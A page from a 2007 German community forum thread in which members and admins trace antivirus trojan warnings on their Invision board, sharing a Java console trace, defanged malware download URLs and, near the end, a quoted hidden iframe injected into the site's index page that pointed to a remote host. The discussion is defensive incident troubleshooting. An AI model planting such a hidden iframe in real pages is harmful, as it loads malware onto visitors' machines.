..:: Hier gehts zu MBLNews.de ::..    ..:: Bald is Weihnachten ;-) ::..
 Willkommen Gast ( Einloggen | Registrieren )

Hilfe | Suche | Kalender

Seiten: (3) 1 2 [3]  ( Erstes neues Post )
Trojaner hier bei MBL?
« Älteres Thema | Neueres Thema » Thema abonnieren | Thema versenden | Thema drucken
Epi
Geschrieben am: Fri, 16 March 2007, 19:03


Unregistered









Zitat (Doppelklick zum übernehmen) (Sidschei @ Fri, 16 March 2007, 18:34)
ich schreib dann mal welche rein, vielleicht willst Du die mal antesten dann biggrin.gif

Hehe, immer man her damit, teste ich gerne mal an party.gif


Ich hätte ja mal eher drauf kommen können, aber den IE mag ich mittlerweile halt nimmer mehr...
Wenn ich mit dem IE dieses Board besuche, passiert rein gar nix trotz aktiviertem Java.

So, und beim Firefox hab ich dann Java deaktiviert und den Sun-Ordner komplett gelöscht,
danach passiert hier auf der Seite nichts.
Habs dann wieder aktiviert, zack kam die Warnung wieder und in der Statusleiste taucht
dann dieses auf

user posted image

Ich google mal noch ein wenig, aber das hier find ich schon mal recht spannend...



Und viel Spaß beim FFF smile.gif
 
  Top
Sidschei
Geschrieben am: Fri, 16 March 2007, 19:48


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



Oh, den Namen des Applets konnte ich bisher nicht sehen - interessant smile.gif

Der Link ist interessant, steht da wenigstens mal eine Variante drin, wie das passieren kann - auch wenn keine richtige Loesung genannt wird laugh.gif

Werd unter den Gesichtspunkten mal suchen und ggfs mit denen mal versuchen Kontakt aufzunehmen!

danke Epi - das hat wirklich mal einen entscheidenden Schritt gebracht, an dem man weiterarbeiten kann thumbsup.gif



sid

PS: Wenn du dich registierst, musst du den haken nicht immer setzen tongue.gif zahn.gif - sorry, konnt ich mir nicht verkneifen icon22.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Epi
Geschrieben am: Fri, 16 March 2007, 20:04


Grünschnabel


Gruppe: Members
Beiträge: 5
Mitgliedsnummer.: 2612
Mitglied seit: 16.03.2007



Zitat (Doppelklick zum übernehmen) (Sidschei @ Fri, 16 March 2007, 19:48)
PS: Wenn du dich registierst, musst du den haken nicht immer setzen tongue.gif zahn.gif - sorry, konnt ich mir nicht verkneifen icon22.gif

floet.gif

Nachdem ich vorhin mein eigenes Posting nicht sehen konnte,
hab ich das schon längst gemacht tongue.gif

Freut mich, wenn dir das weiterhilft... Ich hab noch ein paar Links auf Lager smile.gif

Link1

Link2

Link3


Wobei ich mit dem letzten Link am wenigsten anfangen kann,
aber vielleicht blickst du ja durch zwink.gif
 
     Top
Guest
Geschrieben am: Fri, 16 March 2007, 21:53


Unregistered









Zitat (Doppelklick zum übernehmen) (Epi @ Fri, 16 March 2007, 19:03)
So, und beim Firefox hab ich dann Java deaktiviert und den Sun-Ordner komplett gelöscht,
danach passiert hier auf der Seite nichts.
Habs dann wieder aktiviert, zack kam die Warnung wieder und in der Statusleiste taucht
dann dieses auf


Ich kann nur dazu sagen, dass bei mir Java aktiviert ist rolleyes.gif

Wie schon weiter vorn mal erwähnt bin ich ebenfalls mit dem Firefox unterwegs und erhalte keine Warnung unsure.gif

Ich vermute mal, dass eure Firewall etwas zu "scharf" eingestellt ist

Andi

 
  Top
Guest
Geschrieben am: Sat, 17 March 2007, 00:36


Unregistered









Zitat (Doppelklick zum übernehmen)
Ich vermute mal, dass eure Firewall etwas zu "scharf" eingestellt ist


Aha...weil die Firewall zu scharf eingestellt ist, melden sich die Antivir Programme mit einer Trojaner Warnung :grübel
Das muss ich mal überdenken biggrin.gif

Bei mir besteht das Problem mit der Trojaner Warnung nach wie vor.
Der Herr Norton meldet sich grundsätzlich, wenn ich das MBL Board aufrufe.
Ich habe nur bei diesem Board den Ärger mit der Meldung.

IE6 und Norton Antivirus...........Norton Firewall ist nicht installiert laugh.gif

Guest
 
  Top
Epi
Geschrieben am: Sat, 17 March 2007, 02:50


Grünschnabel


Gruppe: Members
Beiträge: 5
Mitgliedsnummer.: 2612
Mitglied seit: 16.03.2007



Zitat (Doppelklick zum übernehmen) (Guest @ Fri, 16 March 2007, 21:53)
Ich kann nur dazu sagen, dass bei mir Java aktiviert ist  rolleyes.gif

Wie schon weiter vorn mal erwähnt bin ich ebenfalls mit dem Firefox unterwegs und erhalte keine Warnung  unsure.gif

Ich vermute mal, dass eure Firewall etwas zu "scharf" eingestellt ist 

Andi

Wie der Guest schon richtig festgestellt hat, die Warnung kommt vom Antiviren-Proggie und nicht von der FW...

Und fühl dich mal nicht zu sicher *g*
Ich hatte auch ne ganze Weile Ruhe und nu geht das wieder los gruebel.gif

Ich surfe im Übrigen gerade mit nem Laptop, der wegen einer Reparatur gerade frisch aufgesetzt wurde
und hier besteht das Problem genauso (Firefox, Antivir).

In der Java-Konsole ist übrigens dies hier zu finden:

Code (Doppelklick zum übernehmen)
Laden: Klasse BaaaaBaa.class nicht gefunden
java.lang.ClassNotFoundException: BaaaaBaa.class
at sun.applet.AppletClassLoader.findClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.applet.AppletClassLoader.loadClass(Unknown Source)
at java.lang.ClassLoader.loadClass(Unknown Source)
at sun.applet.AppletClassLoader.loadCode(Unknown Source)
at sun.applet.AppletPanel.createApplet(Unknown Source)
at sun.plugin.AppletViewer.createApplet(Unknown Source)
at sun.applet.AppletPanel.runLoader(Unknown Source)
at sun.applet.AppletPanel.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
Caused by: java.io.IOException: open HTTP connection failed.
at sun.applet.AppletClassLoader.getBytes(Unknown Source)
at sun.applet.AppletClassLoader.access$100(Unknown Source)
at sun.applet.AppletClassLoader$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)


blink.gif

Ich guck mal in ein paar Stündchen in der Konsole auf meinem Computer nach,
ob da irgendwas aufschlussreiches steht...

Guts Nächtle smile.gif
 
     Top
hi leute
Geschrieben am: Sat, 17 March 2007, 03:22


Unregistered









smile.gif
also ich möchte kurz zu dem trojanerproblem etwas sagen, da ich sehr gerne diese seite besuche um mich zu informieren und den spaß bei den grillies mitzuerleben, bin also "silentreader" floet.gif

so langsam vermute ich das auf irgendeinen weg die ip dieser domain abgegriffen wird und bei aufruf dieser domain von entsprechenden seiten irgendwas an müll geladen wird. mit cc-comm... hatte ich bis gestern auch.

eben gerade wieder sprang mir die firewall (av ist meinst deaktiviert) ins gesicht und meckerte folgendes an, was im temp-ordner gespeichert und ausgeführt werden sollt freak.gif
rf802792592mm.exe

im ie-temp-ordner befand sich folgendes:
hxxp://surka.info/index.php?adv=17
hxxp://surka.info//files/exe.php?adv=17&spl=rds


das es mit der skypeonlineanzeige, was sid ansprach, zusammen hängen könnte kann ich natürlich nicht sagen, kanns mir aber auch schwer vorstellen, da dann sicher nicht alle sicherheitssysteme anspringen würden.

na wer weiß was da im hintergrund aktiv ist blink.gif

bis denne und gute nacht winke2.gif
 
  Top
Sidschei
Geschrieben am: Sat, 17 March 2007, 05:59


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



So viele Infos auf einen Schlag, und noch so drueh am Morgen zwinker.gif

Erstmal - auch wenn ich mit den komplett namenlosen Gaesten solangsam den Ueberblick verliere laugh.gif - meinen herzlichsten Dank an Euch alle fuer diese rege Teilnahme an der Fehlersuche thumbsup.gif respect.gif und ein Hallo an den stillen Leser winke.gif (die Grillianer beissen nicht floet.gif )

Also, ich versuch nun die ganzen Infos mal zu sortieren - wir sind nun deutlich einen Schritt weiter und nun kann man wohl zumindest sagen, dass das Problem wirklich hier ausgeloest wird. Das ist schon mal was, wie ich finde. Nicht unbedingt schoen (fuer uns) aber endlich ein Ansatz!

Ich hab den einen typen mal angeschrieben, auch schon weitere hilfe eingefordert yesnick.gif und hoffe, dass wir dann im Laufe der Zeit eine Loesung dafuer finden yesnick.gif

Epi:
Zitat (Doppelklick zum übernehmen)
Laden: Klasse BaaaaBaa.class nicht gefunden
Na, wenn er die Klasse nicht findet, ists ja erstmal auf gewisse Art und Weise gut yesnick.gif

Ansonsten wuerde ich Euch schlichtweg bitten, momentan JAVA zu DEAKTIVIEREN, dann seit ihr definitiv, soviel hab ich nun zwischenzeitlich beim Studium der Links durchaus kapiert, erstmal auf der sicheren Seite.

Ich halte auf dem Laufenden smile.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
GreatWhite
Geschrieben am: Sat, 17 March 2007, 07:17


Yakuza Kochclub Vorsitzender


Gruppe: Admin
Beiträge: 8128
Mitgliedsnummer.: 124
Mitglied seit: 14.07.2003



bigeyes.gif Uiiiii ist hier was los laugh.gif

@ Epi winke2.gif

Ja, ich hatte Java danach wieder eingeschaltet und es ist nix mehr "passiert". Aber nach der erneuten "Warnung" durch AntiVir vor einigen Tagen isser jetzt erstmal GANZ aus und logischerweise gibts seitdem auch keine Warnungen mehr !

Hoff ich doch mal laugh.gif

Greaty

--------------------
"So wie ich das sehe, ist die Intelligenz bereits ausgerottet & es existieren nur noch die Idioten ! " D.o.t.D
 
     Top
GreatWhite
Geschrieben am: Sat, 17 March 2007, 07:17


Yakuza Kochclub Vorsitzender


Gruppe: Admin
Beiträge: 8128
Mitgliedsnummer.: 124
Mitglied seit: 14.07.2003



bigeyes.gif Uiiiii ist hier was los laugh.gif

@ Epi winke2.gif

Ja, ich hatte Java danach wieder eingeschaltet und es ist nix mehr "passiert". Aber nach der erneuten "Warnung" durch AntiVir vor einigen Tagen isser jetzt erstmal GANZ aus und logischerweise gibts seitdem auch keine Warnungen mehr !

Hoff ich doch mal laugh.gif

Greaty

--------------------
"So wie ich das sehe, ist die Intelligenz bereits ausgerottet & es existieren nur noch die Idioten ! " D.o.t.D
 
     Top
GreatWhite
Geschrieben am: Sat, 17 March 2007, 07:19


Yakuza Kochclub Vorsitzender


Gruppe: Admin
Beiträge: 8128
Mitgliedsnummer.: 124
Mitglied seit: 14.07.2003



und mal wieder ein Doppelposting motz.gif

Sch.... F5 Taste......

Liegt aber auch bestimmt daran, das heute morgen noch zu "drueh" ist.

Zitat (Doppelklick zum übernehmen)
So viele Infos auf einen Schlag, und noch so drueh am Morgen


anon.gif Greaty

--------------------
"So wie ich das sehe, ist die Intelligenz bereits ausgerottet & es existieren nur noch die Idioten ! " D.o.t.D
 
     Top
Sidschei
Geschrieben am: Sat, 17 March 2007, 07:43


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



iss es auch tongue.gif

also, ich such mich dumm und daemlich - aber ich kann keinerlei code-veraenderungen finden nixweiss.gif wenn da nicht ein fachmann auftaucht, hab ich irgendwie ein problem sad.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Sidschei
Geschrieben am: Sat, 17 March 2007, 08:28


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



So - ich finde die Ursache nicht kotz.gif Aber ich denke, ich konnte die "Wirkung" nun wenigstens unterbinden.

Das ist zwar absolut nicht fein und auch definitiv nicht sauber und endgueltig, aber fuer den Moment sollte es zumindest helfen, bis auch auch nur den Hauch einer Ahnung habe, was da ablaeuft.

Ich habe die Bitte - ich konnte ja nicht alle Seiten des Boards testen - wenn das Teil wieder auftaucht mir vor allem auch mitzuteilen, WO es aufgetaucht ist. Also, bei der Boarduebersicht, Beitrag editieren, PMs lesen... etcpp.

Ansonsten hoffe ich, dass es nun mal eingedaemmt, wenn auch sicherlich nicht geloest ist sad.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Epi
Geschrieben am: Sat, 17 March 2007, 09:57


Grünschnabel


Gruppe: Members
Beiträge: 5
Mitgliedsnummer.: 2612
Mitglied seit: 16.03.2007



Moin zusammen winke2.gif

Zitat (Doppelklick zum übernehmen)
Ja, ich hatte Java danach wieder eingeschaltet und es ist nix mehr "passiert". Aber nach der erneuten "Warnung" durch AntiVir vor einigen Tagen isser jetzt erstmal GANZ aus und logischerweise gibts seitdem auch keine Warnungen mehr !


Feigling tongue.gif No risk - no fun zwink.gif


Zitat (Doppelklick zum übernehmen)
Aber ich denke, ich konnte die "Wirkung" nun wenigstens unterbinden.


sad.gif Wie langweilig *g* Antivir muckt gar nicht mehr...

Der IE hatte heute morgen ne interessante Meldung, die ich mir aber leider nicht so schnell merken konnte (war auch bei mir noch zu drueh laugh.gif ) und nun weiss ich leider auch nicht, ob ich die irgendwo wieder aufstöbern kann. Lag aber vielleicht auch daran, dass du da gerade am werkeln warst? Da war auch überall MBL durch FCC ersetzt *g*

Die hier scheinen auch als Ansprechpartner gut zu sein...
 
     Top
Guest
Geschrieben am: Sat, 17 March 2007, 10:21


Unregistered









Zitat (Doppelklick zum übernehmen) (hi leute @ Sat, 17 March 2007, 03:22)
da ich sehr gerne diese seite besuche um mich zu informieren

es gibt ja doch mal Feedback a_woot.gif

Andi

 
  Top
Sidschei
Geschrieben am: Sat, 17 March 2007, 12:41


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



Zitat (Doppelklick zum übernehmen) (Epi @ Sat, 17 March 2007, 10:57)
Zitat (Doppelklick zum übernehmen)
Aber ich denke, ich konnte die "Wirkung" nun wenigstens unterbinden.


sad.gif Wie langweilig *g* Antivir muckt gar nicht mehr...


brick.gif tongue.gif

Zitat (Doppelklick zum übernehmen)
(war auch bei mir noch zu drueh  laugh.gif )


brick.gif brick.gif Sucht ihr um die Uhrzeit mal Fehler, von denen ihr keinerlei AHnung habt laugh.gif brick.gif

Zitat (Doppelklick zum übernehmen)
Lag aber vielleicht auch daran, dass du da gerade am werkeln warst? Da war auch überall MBL durch FCC ersetzt *g*


Hehe laugh.gif Ja, da bist du voll in der Zeit auf dem Board gewesen, wo ich im Code die Stelle gesucht hab, wo ich eingreifen muss/kann... laugh.gif gestestet hab ich das, indem ich MBL durch FCC ersetzt hab laugh.gif - Das war aber maximal 2 Minuten aktiv skeptisch.gif

so hab ich das Problem, um Euch "teilhaben zu lassen" auch momentan geloest. Ich entferne per PHP vor der Seitenausgabe (an den Browser) die iFrames, die tatsaechlich hier im Code vorhanden waren! Der Dank gebuehrt definitiv Dir Epi, deine gelungenen Hinweise und Recherchen haben dazu beigetragen, wenigstens den Grund mal zu finden. Ein dickes DANKE hierfuer! respect.gif

Zitat (Doppelklick zum übernehmen)
Die hier scheinen auch als Ansprechpartner gut zu sein...


ich hasse das motz.gif nirgends wird zB geschrieben, wie man das "Loch im ftp" schliessen kann gruebel.gif Ich wend mich auch mal an die, sobald ich den "FFF-Rausch" ausgeschlafen hab zahn.gif

sid

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Epi
Geschrieben am: Sat, 17 March 2007, 14:22


Grünschnabel


Gruppe: Members
Beiträge: 5
Mitgliedsnummer.: 2612
Mitglied seit: 16.03.2007



Zitat (Doppelklick zum übernehmen) (Sidschei @ Sat, 17 March 2007, 12:41)
brick.gif tongue.gif

brick.gif brick.gif brick.gif


wife.gif

Zitat (Doppelklick zum übernehmen)
Hehe laugh.gif Ja, da bist du voll in der Zeit auf dem Board gewesen, wo ich im Code die Stelle gesucht hab, wo ich eingreifen muss/kann... laugh.gif gestestet hab ich das, indem ich MBL durch FCC ersetzt hab laugh.gif - Das war aber maximal 2 Minuten aktiv skeptisch.gif


Da war ich gerade aus dem Bett gekrabbelt und hab meinen Augen kaum getraut laugh.gif Gutes Timing, gell?

Zitat (Doppelklick zum übernehmen)
Ich entferne per PHP vor der Seitenausgabe (an den Browser) die iFrames, die tatsaechlich hier im Code vorhanden waren!


Hört sich genial an und funzt ja auch prima thumbsup.gif Und du willst keine Ahnung haben? *g*

Zitat (Doppelklick zum übernehmen)
Ein dickes DANKE hierfuer!


erroet.gif Aber gerne doch... Hat mir nen Heidenspass gemacht, endlich mal was los am Rechner freak.gif

Zitat (Doppelklick zum übernehmen)
ich hasse das motz.gif nirgends wird zB geschrieben, wie man das "Loch im ftp" schliessen kann


Das hat mich auch etwas verwundert, die scheinen alle ihr Wissen nicht gerne preiszugeben...


Ich hab jetzt mal in Richtung Invision Board gegoogelt... Kannste damit was anfangen? gruebel.gif Ist schon etwas älter, aber scheint ja in die Richtung zu gehen...

Noch was gefunden... Von da aus gibt's dann nochmal weitere Links... Ist auf jeden Fall interessant, das zu lesen (auch wenn ich da nicht wirklich was kapiere *g*)

Bearbeitet von Epi am Sat, 17 March 2007, 15:10
 
     Top
Sidschei
Geschrieben am: Sat, 17 March 2007, 15:22


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



Zitat (Doppelklick zum übernehmen) (Epi @ Sat, 17 March 2007, 15:22)
Zitat (Doppelklick zum übernehmen) (Sidschei @ Sat, 17 March 2007, 12:41)
brick.gif tongue.gif

brick.gif brick.gif brick.gif


wife.gif

Irgendwo muss ich doch meinen angestauten Frust durch den Murks loswerden tongue.gif DU warst halt gerade da laugh.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Das war aber maximal 2 Minuten aktiv skeptisch.gif

Da war ich gerade aus dem Bett gekrabbelt und hab meinen Augen kaum getraut laugh.gif Gutes Timing, gell?


Perfekt floet.gif - Irgendwie schaffts IMMER einer das Board zu besuchen, wenn ich gerade was rummach motz.gif tongue.gif - Und so viele Besucher haben wir ja nun auch nicht, weshalb ich mir das "Off-Setzen" immer spare. Passiert ja nichts, ausser dass evtl. ne Fehlermeldungen oder seltsame Anzeigen kommen icon22.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Ich entferne per PHP vor der Seitenausgabe (an den Browser) die iFrames, die tatsaechlich hier im Code vorhanden waren!

Hört sich genial an und funzt ja auch prima thumbsup.gif Und du willst keine Ahnung haben? *g*


Das ist ja was Anderes 1001.gif - Das hat mit der "Software" und deren "Programmierung" zu tun... und auch wenn ich vieles im Board noch immer nicht Blicke, schaff ichs doch wenigstens meistens die richtigen Stellen zum eingreifen zu finden smile.gif

Ich hab damit das Ursprungsproblem aber ja leider noch nicht geloest, denn prinzipiell haben wir in der Tat ein Problem auf dem ftp - auch wenn sich das nun erstmal nicht mehr auswirkt. Und da gehts nun an die "Technik" - Server, ftp und Co. sind absolut nicht meine Welt - um nicht zu sagen, da hab ich Null Ahnung und weiss vondaher auch absolut nicht, was ich machen soll oder machen koennte. Da bin ich schlichtweg auf Hilfe von Aussen meistens angewiesen. Aber nun ja, wenigstens steh ich dazu icon22.gif

Auch die Tatsache dass ich das nicht "selbst gefunden" habe zeugt ein wenig davon, dass mir das Thema einfach nicht so liegt nixweiss.gif Aber man muss nicht alles wissen kopfschuettel.gif - wichtig ist, die richtigen Leute zu haben/kennen thumbsup.gif


Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
Ein dickes DANKE hierfuer!

erroet.gif Aber gerne doch... Hat mir nen Heidenspass gemacht, endlich mal was los am Rechner freak.gif


Ha laugh.gif Ich geb Dir bescheid, wenn's wieder Probleme zum loesen gibt freak.gif

Zitat (Doppelklick zum übernehmen)
Zitat (Doppelklick zum übernehmen)
ich hasse das motz.gif nirgends wird zB geschrieben, wie man das "Loch im ftp" schliessen kann

Das hat mich auch etwas verwundert, die scheinen alle ihr Wissen nicht gerne preiszugeben...


Zum einen das ein beliebtes Problem im Net, zum anderen aber wohl auch die Tatsache, dass 99% der User mit den Erklaerungen nichts anfangen koennen - und sich auch nur fuer das Endergebnis interessieren sad.gif

Zitat (Doppelklick zum übernehmen)
Ich hab jetzt mal in Richtung Invision Board gegoogelt...  Kannste damit was anfangen?  gruebel.gif  Ist schon etwas älter, aber scheint ja in die Richtung zu gehen...


Da siehst'e mal - da bist du erfolgreicher als ich laugh.gif hab ich heute morgen auch gemacht - zwar massig das "Problem" gefunden, aber nichts sinnvoll verwertbares... die Meldung ist toll - im Negativen Sinne sad.gif Updaten wird verdammt schwierig, wegen der massenhaften Modifikationen am Board. SHIT!

Muss aber mal genauer schauen, ob das nicht evtl. die Sicherheitsluecken betrifft, die wir schon selbst "gestoppt" haben, wie das Massenhafte gespame.

Zitat (Doppelklick zum übernehmen)
Noch was gefunden...  Von da aus gibt's dann nochmal weitere Links... Ist auf jeden Fall interessant, das zu lesen (auch wenn ich da nicht wirklich was kapiere *g*)


Auch hierfuer Danke smile.gif Die gehts wie mir - wirklich kapieren tu ich es auch nicht laugh.gif Aber SEHR INTERESSANTER LINK super.gif Da werd ich mich mal tiefer Einlesen, da koennten Loesungen drinstehen a_woot.gif - Aber nicht mehr heute, bin auf dem Sprung tongue.gif

Nun, ich dfinde das weniger Interessant - eher laestig laugh.gif - Hindert mich daran die Dinge zu tun, die ich eigentlich tun will - aber dass du die Links findest, nimmt mir schon viel Zeit ab. Danke nochmals smile.gif

Sid

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
hi leute
Geschrieben am: Sun, 18 March 2007, 02:28


Unregistered









sid, das was du da verbogen hast scheints ja gebracht zu haben respect.gif
nix mehr mit firewall meldungen auf der seite thumbsup.gif

auch wenn du sagst es ist nicht sauber gelöst, is doch null problem. ich programmiere selber sehr viel, und wenns irgendwo nicht so will wirds halt erstmal "hingefrickelt" bis eine bessere lösung in aussicht steht, ist glaub ich auch normal.

aber ich finds wirklich supi, so kann man wieder unbesorgt eure seite betretten smile.gif

danke dir und gutes nächtle an alle punk.gif
 
  Top
Epi
Geschrieben am: Sun, 18 March 2007, 12:52


Grünschnabel


Gruppe: Members
Beiträge: 5
Mitgliedsnummer.: 2612
Mitglied seit: 16.03.2007



Zitat (Doppelklick zum übernehmen) (Sidschei @ Sat, 17 March 2007, 15:22)
...Updaten wird verdammt schwierig, wegen der massenhaften Modifikationen am Board. SHIT!...

...aber dass du die Links findest, nimmt mir schon viel Zeit ab...

Hallo alle miteinander smile.gif

Ich geb es nu aber auch auf, da noch was zu finden. Leider scheitert alles daran, dass diese Version des Boards wohl nicht mehr supportet wird. Wenn ich denn was finde, ist das ab Version 1.3 sad.gif

Ansonsten find ich das sehr passend, was der Guest hi leute biggrin.gif geschrieben hat. Auch wenn da leider noch jemand Zugriff auf das Board hat, so haste demjenigen zumindest gehörig die Suppe versalzen mit deiner Lösung thumbsup.gif

Epi
 
     Top
Sidschei
Geschrieben am: Sun, 18 March 2007, 12:55


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



hi hi leute zahn.gif

danke fuer die Blumen - wenn ich was machen "kann", dann versuch ich natuerlich alles, das auch zu tun, keine Frage smile.gif Genauso wie ich im Gegenzug auch zugebe, dass ich einfach keinen Plan habe zahn.gif Du darfst bei der Danksagung aber "Efi" nicht vergessen kopfschuettel.gif Nur durch seinen gelungenen Einsatz war mein Handeln ueberhaupt moeglich yesnick.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Heby
Geschrieben am: Sun, 18 March 2007, 19:54


HC-Grilli


Gruppe: Members
Beiträge: 13313
Mitgliedsnummer.: 17
Mitglied seit: 29.04.2003



Der Heby meldet nun auch

Keinerlei Meldungen

jedenfalls im moment.

Danke für Eure Hilfe thumbsup.gif
denn nur so funktioniert ein Board

Heby

--------------------
user posted image
 
    Top
hi leute
Geschrieben am: Sun, 22 April 2007, 23:42


Unregistered









hallöchen winke2.gif
Zitat (Doppelklick zum übernehmen) (Heby)
Keinerlei Meldungen
jedenfalls im moment


es scheint sich wohl ausmomentet zu haben
eben gerad wieder springt die firewall an weil sich ein unding wie 176853.exe (die nummer variiert) ausführen will ohmy.gif

im quelltext der index findet sich ganz am ende auch folgendes
Code (Doppelklick zum übernehmen)
<iframe src="hxxp://lamerov-net.jino-net.ru/.../" width=1 height=1 style="display:none"></iframe>


sid, die arbeit ruft thumbsup.gif zwinkerms.gif

und einen schönen wochenanfang euch allen smile.gif

btw. funzt die registrierung nimmer? also bei mir werden weder im ie noch firefox die sicherheitscode bilder angezeigt blink.gif
 
  Top
Sidschei
Geschrieben am: Mon, 23 April 2007, 08:42


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



Zitat (Doppelklick zum übernehmen) (hi leute @ Mon, 23 April 2007, 00:42)
sid, die arbeit ruft thumbsup.gif zwinkerms.gif

Möööp... Zur Stelle zahn.gif Danke fuers Melden! Da ich kein Java aktiviert habe, hab ich das mal wieder nicht mitbekommen und als ich es das letzte mal gecheckt habe (was ich in (un)regelmaessigen Abstaenden mache) wars noch nicht da... und nun ists wieder weg.

Desweiteren zur Info: "Wir" laugh.gif floet.gif basteln gerade daran, eine neue Version des Boards zu installieren - nicht zuletzt wegen der Geschichte. Ich kann nicht sagen, wann das kommen wird, weil es einige Probleme bei der Uebernahme der DB gibt, aber ich denke sofern das Problem irgendwann mal geloest wird, dass es in (un zwinker.gif )absehbarer Zeit kommen wird smile.gif


Zitat (Doppelklick zum übernehmen)
und einen schönen wochenanfang euch allen smile.gif


Dir auch winke.gif

Zitat (Doppelklick zum übernehmen)
btw. funzt die registrierung nimmer? also bei mir werden weder im ie noch firefox die sicherheitscode bilder angezeigt blink.gif


Eigentlich sollte es funktionieren gruebel.gif Bist allerdings schon der zweite der sagt dass die Bilder nicht mehr angezeigt werden (wenn auch an anderer Stelle) so dass ich auch dem mal ein wenig nachgehen werde! ... Ergebnis folgt dann smile.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Sidschei
Geschrieben am: Tue, 24 April 2007, 17:29


King of Bollywood alias MacGyver-Sid


Gruppe: Admin
Beiträge: 58088
Mitgliedsnummer.: 9
Mitglied seit: 27.04.2003



wir vermuten bei dem Problem der Grafiken bei der Anmeldung ein Problem welches mit dem Serverumzug zusammenhaengt... denn selbst wenn man ein Board nagelneu installiert, besteht das Problem... Mal sehen was der HOster dazu sagen wird nun erstmal zwinker.gif

Wenn die Tage nichts dabei rauskommt, nehm ich die Code-Abfrage erstmal halt raus unsure.gif

--------------------
Nicht mehr alle Tassen im Schrank? - Dann stell doch Gläser rein!
 
     Top
Thema wird von 0 Benutzer gelesen (0 Gäste und 0 Anonyme Benutzer)
0 Mitglieder:
74 Antworten seit Tue, 20 February 2007, 12:43 Thema abonnieren | Thema versenden | Thema drucken
Seiten: (3) 1 2 [3] 
<< Zurück zu Rund um MBL

 




[ Script Execution time: 0.0379 ]   [ 12 queries used ]   [ GZIP aktiviert ]